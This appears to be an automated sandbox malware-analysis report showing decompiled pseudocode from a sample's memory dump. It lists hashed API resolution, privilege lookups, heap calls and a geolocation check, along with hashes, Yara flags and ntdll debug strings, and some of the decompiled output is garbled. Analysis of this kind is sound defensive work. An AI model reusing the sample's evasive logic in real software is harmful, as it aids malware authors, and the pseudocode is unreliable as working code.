					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E00420183( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E00409893(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041F9D3(__ecx);
					_t12 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t12;
					_a16 = 0;
					while(1) {
						__eax = E004102E3(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E703(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L11:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L15;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L11;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L11;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420103(_a12,  &_v688, 0x2a8);
										L15:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E693(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t32 = __esi + 0x2e8; // 0x2e8
											__eax = _t32;
											 *_t32 = _v136;
											__eax = _a12;
											_t34 = __esi + 0x314; // 0x314
											__ebx = _t34;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF13(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t42 = __esi + 0x2e0; // 0x2e0
												__eax = _t42;
												_push(_t42);
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												__ecx = _a12;
												_push(__ebx);
												_push(0x1a);
												__ecx = _a12 + 0x224;
												_push(_a12 + 0x224);
												 *(__esi + 0x2e4) = __edx;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E0041DF53(__ebx, __edx, __edi);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041F673(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E00420323( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t57 = __eax + 2; // 0x2
													__ecx = __eax + _t57;
													__eax =  &_v656;
													__eax = E004191A3(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L11;
									}
								}
							}
						}
						goto L19;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L19:
			}



















                                          0x0040992b
                                          0x00409931
                                          0x004098db
                                          0x004098e0
                                          0x004098e7
                                          0x004098e9
                                          0x004098f6
                                          0x004098fa
                                          0x00409913
                                          0x0040991e
                                          0x0040991e
                                          0x004098fa
                                          0x00409926
                                          0x00409933
                                          0x00409933
                                          0x00409934
                                          0x00409936
                                          0x0040993c
                                          0x0040993d
                                          0x0040993e
                                          0x0040993f
                                          0x00409947
                                          0x0040994a
                                          0x00409957
                                          0x0040995c
                                          0x0040995f
                                          0x00409965
                                          0x0040996a
                                          0x00409972
                                          0x0040997d
                                          0x0040997d
                                          0x00409984
                                          0x00409993
                                          0x00409999
                                          0x0040999e
                                          0x004099ab
                                          0x004099b5
                                          0x004099bd
                                          0x004099c3
                                          0x004099c5
                                          0x00000000
                                          0x00000000
                                          0x004099c7
                                          0x004099cf
                                          0x004099e9
                                          0x004099e9
                                          0x004099ec
                                          0x004099ed
                                          0x004099f0
                                          0x004099f3
                                          0x00000000
                                          0x004099f5
                                          0x004099f5
                                          0x00000000
                                          0x004099f5
                                          0x004099d1
                                          0x004099d1
                                          0x004099d8
                                          0x00000000
                                          0x004099da
                                          0x004099da
                                          0x004099e1
                                          0x00000000
                                          0x004099e3
                                          0x004099e3
                                          0x004099e7
                                          0x00409a03
                                          0x00409a0b
                                          0x00409a13
                                          0x00409a18
                                          0x00409a20
                                          0x00409a20
                                          0x00409a28
                                          0x00409a30
                                          0x00409a32
                                          0x00000000
                                          0x00409a34
                                          0x00409a34
                                          0x00409a3a
                                          0x00409a3d
                                          0x00409a43
                                          0x00409a46
                                          0x00409a4c
                                          0x00409a4c
                                          0x00409a53
                                          0x00409a55
                                          0x00409a58
                                          0x00409a58
                                          0x00409a5f
                                          0x00409a62
                                          0x00409a69
                                          0x00409a6f
                                          0x00409a75
                                          0x00409a7b
                                          0x00409a81
                                          0x00409a87
                                          0x00409a8d
                                          0x00409a92
                                          0x00409a97
                                          0x00409a9d
                                          0x00409a9f
                                          0x00000000
                                          0x00409aa5
                                          0x00409aa5
                                          0x00409aa8
                                          0x00409aa8
                                          0x00409aae
                                          0x00409aaf
                                          0x00409ab5
                                          0x00409abb
                                          0x00409ac1
                                          0x00409ac7
                                          0x00409acd
                                          0x00409ad0
                                          0x00409ad1
                                          0x00409ad3
                                          0x00409ad9
                                          0x00409adb
                                          0x00409ae1
                                          0x00409ae7
                                          0x00409af1
                                          0x00409af9
                                          0x00409aff
                                          0x00409b01
                                          0x00000000
                                          0x00409b07
                                          0x00409b07
                                          0x00409b0d
                                          0x00409b0d
                                          0x00409b13
                                          0x00409b20
                                          0x00409b22
                                          0x00409b26
                                          0x00409b2b
                                          0x00409b2e
                                          0x00409b2e
                                          0x00409b3e
                                          0x00409b46
                                          0x00409b4e
                                          0x00409b4f
                                          0x00409b50
                                          0x00409b51
                                          0x00409b53
                                          0x00409b54
                                          0x00409b54
                                          0x00409b01
                                          0x00409a9f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004099e7
                                          0x004099e1
                                          0x004099d8
                                          0x00000000
                                          0x004099cf
                                          0x004099fa
                                          0x004099fb
                                          0x004099fc
                                          0x004099fc
                                          0x004099fe
                                          0x004099ff
                                          0x00409a01
                                          0x00409a02
                                          0x00409a02
                                          0x00000000

                                          APIs
                                          • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                          • Instruction ID: 42ad5854a2e7b942de746f5d6c01182a578b4c63b133ec1084285a3336115312
                                          • Opcode Fuzzy Hash: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                          • Instruction Fuzzy Hash: F461B4B0A00305AFD724DF65DC86BEB73A8EB45304F00457EF949A7381DB74AE418BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409893 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 71%
                                          			E00409893(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				void* _t24;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420183( &_v67, 0, 0x3f);
				E00420C33( &_v68, 3);
				_t19 = _a4;
				_t26 = _a4 + 0x20;
				_t13 = E0040CF03(_t32, _a4 + 0x20,  &_v68); // executed
				_push(0xbf25f8a5);
				_t24 = _t13;
				_t15 = E004195B3(_t26, _t24, 0, 0, E00402E13());
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t9 = (E0040C5D3(1, 8, _t19 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
						return  *_t27(_t25, 0x8003, _t28 + _t9, _t15);
					}
				}
				return _t15;
			}












                                          0x00409893
                                          0x004098a4
                                          0x004098a8
                                          0x004098b3
                                          0x004098b8
                                          0x004098bf
                                          0x004098c3
                                          0x004098c8
                                          0x004098cd
                                          0x004098db
                                          0x004098e0
                                          0x004098e7
                                          0x004098e9
                                          0x004098f6
                                          0x004098fa
                                          0x00409913
                                          0x00000000
                                          0x0040991e
                                          0x004098fa
                                          0x00409926

                                          APIs
                                          • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                          • Instruction ID: 97372187852fa5e1adf49ca0e465a128001ac0af3e8014b44584ab3ce766e153
                                          • Opcode Fuzzy Hash: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                          • Instruction Fuzzy Hash: 95019B71A8031876E7216691DC42FEF776C9B44B54F54012DFF047A1C2D6E8AA0587E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E9C5 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 431 41e9c5-41e9d0 432 41e9b3-41e9c3 431->432 433 41e9d2-41e9ed call 41f1b3 431->433 436 41e9f2-41ea07 LookupPrivilegeValueW 433->436
                                          C-Code - Quality: 64%
                                          			E0041E9C5(void* __eax, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v117;
				int _t16;

				asm("o16 fstp tword [esi-0x25de8b42]");
				asm("loop 0xffffffe3");
				ss = _v117;
				_t13 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _t13, _t13 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t16 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t16;
			}





                                          0x0041e9c9
                                          0x0041e9d0
                                          0x0041e9d2
                                          0x0041e9d6
                                          0x0041e9ed
                                          0x0041ea03
                                          0x0041ea07

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                          • Instruction ID: 0263855f051aa3e283c50ba551ccbdc2edf87f179c8fe257d40e8d7a90bbd0ca
                                          • Opcode Fuzzy Hash: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                          • Instruction Fuzzy Hash: 07F06DB6604204BFCB20DF99DC81EEB77A9EF88754F108559FD4C97281C636E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E865 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 443 41e865-41e88a call 41f1b3 445 41e88f-41e8a4 RtlFreeHeap 443->445
                                          C-Code - Quality: 72%
                                          			E0041E865(intOrPtr __eax, void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t17;

				asm("lds ebp, [esi]");
				 *0x9cc116e9 = __eax;
				 *__edi =  *__edi - __ebx +  *((intOrPtr*)(__esi - 0x2d));
				_t14 = _a4;
				_push(__esi);
				_t8 = _t14 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t14, _t8,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t17;
			}





                                          0x0041e868
                                          0x0041e86a
                                          0x0041e86f
                                          0x0041e876
                                          0x0041e87c
                                          0x0041e882
                                          0x0041e88a
                                          0x0041e8a0
                                          0x0041e8a4

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                          • Instruction ID: db7fe254e23705c02db2d6c613c9e7060c507d673460d2e0dd7a4286191a99f8
                                          • Opcode Fuzzy Hash: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                          • Instruction Fuzzy Hash: 79F08CB1640205AFCB14DF69CC45EEB7BA9EF89344F14455AF98897282D231D815CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410043 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00410043(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                          0x0041005d
                                          0x00410067
                                          0x0041006d
                                          0x0041007c
                                          0x0041006a
                                          0x0041006a
                                          0x0041006a

                                          APIs
                                          • GetUserGeoID.KERNELBASE(00000010), ref: 0041006D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: User
                                          • String ID:
                                          • API String ID: 765557111-0
                                          • Opcode ID: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                          • Instruction ID: ada836e890b82e0dd553c32112272efd72bacd2a7c40ed4153c4fba82fb23b99
                                          • Opcode Fuzzy Hash: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                          • Instruction Fuzzy Hash: 13E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E873 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E873(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e882
                                          0x0041e88a
                                          0x0041e8a0
                                          0x0041e8a4

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                          • Instruction ID: 1886f6a66617dfe5414ac9ff53834b0e5857080f48b025a3e0b38d79a8bd7b6d
                                          • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                          • Instruction Fuzzy Hash: 10E012B2200208ABCB14EF89DC49EA737ACAF88754F018059BE095B282C630E914CAF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E833 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E833(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e842
                                          0x0041e84a
                                          0x0041e860
                                          0x0041e864

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E860
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                          • Instruction ID: df2cfb87f9ff2096fd868703bf6a6fcec91ae6a8f85b57d06528ce7919eb225c
                                          • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                          • Instruction Fuzzy Hash: 36E012B2210208ABCB14EF89DC45EA737ACAF88664F018059BE085B242C630F9148AF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E9D3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E9D3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e9ed
                                          0x0041ea03
                                          0x0041ea07

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                          • Instruction ID: 942ffc3d2e0f3bdfb5ddf09c923354268ae6cb2a01bd98db3201c95a286cb933
                                          • Opcode Fuzzy Hash: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                          • Instruction Fuzzy Hash: D6E01AB1600304ABC710DF49CC45EE737ADEF88654F014065BE0D57242C635F8148AF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6f9fde532db9f1ce7a3beb367ab4be77d3e1837983831709602a988df01f038
                                          • Instruction ID: 0a4d5c336d12697b3381f487c9a6c574dbc6d79d57d7dedfb454c95a9eb9808e
                                          • Opcode Fuzzy Hash: b6f9fde532db9f1ce7a3beb367ab4be77d3e1837983831709602a988df01f038
                                          • Instruction Fuzzy Hash: C5B09B719014C5C9D655D7A5860C7177A4077D4745F17C056D2420681B4778C0D1F6F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0115B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          • The instruction at %p referenced memory at %p., xrefs: 0115B432
                                          • This failed because of error %Ix., xrefs: 0115B446
                                          • read from, xrefs: 0115B4AD, 0115B4B2
                                          • an invalid address, %p, xrefs: 0115B4CF
                                          • Go determine why that thread has not released the critical section., xrefs: 0115B3C5
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0115B3D6
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0115B352
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0115B314
                                          • write to, xrefs: 0115B4A6
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0115B53F
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0115B47D
                                          • *** enter .exr %p for the exception record, xrefs: 0115B4F1
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0115B484
                                          • *** then kb to get the faulting stack, xrefs: 0115B51C
                                          • The resource is owned shared by %d threads, xrefs: 0115B37E
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0115B39B
                                          • The critical section is owned by thread %p., xrefs: 0115B3B9
                                          • a NULL pointer, xrefs: 0115B4E0
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0115B323
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 0115B48F
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0115B2F3
                                          • <unknown>, xrefs: 0115B27E, 0115B2D1, 0115B350, 0115B399, 0115B417, 0115B48E
                                          • *** Inpage error in %ws:%s, xrefs: 0115B418
                                          • The instruction at %p tried to %s , xrefs: 0115B4B6
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0115B305
                                          • *** enter .cxr %p for the context, xrefs: 0115B50D
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0115B476
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0115B2DC
                                          • The resource is owned exclusively by thread %p, xrefs: 0115B374
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0115B38F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: 3c7b6d0d7e86a63e38afac5163455290efcd0a6e00d249810478df015251c936
                                          • Instruction ID: e48d18eeea44d3ffa5df6f6579e61cb13f40ad12588d55c94c24a7d2b489b144
                                          • Opcode Fuzzy Hash: 3c7b6d0d7e86a63e38afac5163455290efcd0a6e00d249810478df015251c936
                                          • Instruction Fuzzy Hash: 58812771A48200FFDF6E6A4ACC56D7B3F27AF96A95F410048F9152F116D3618401E776
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01161C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E01161C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010AB150();
				} else {
					E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x119589c);
				E010AB150("Heap error detected at %p (heap handle %p)\n",  *0x11958a0);
				_t27 =  *0x1195898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01161E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010AB150();
				} else {
					E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E010AB150("Error code: %d - %s\n",  *0x1195898);
				_t113 =  *0x11958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Parameter1: %p\n",  *0x11958a4);
				}
				_t115 =  *0x11958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Parameter2: %p\n",  *0x11958a8);
				}
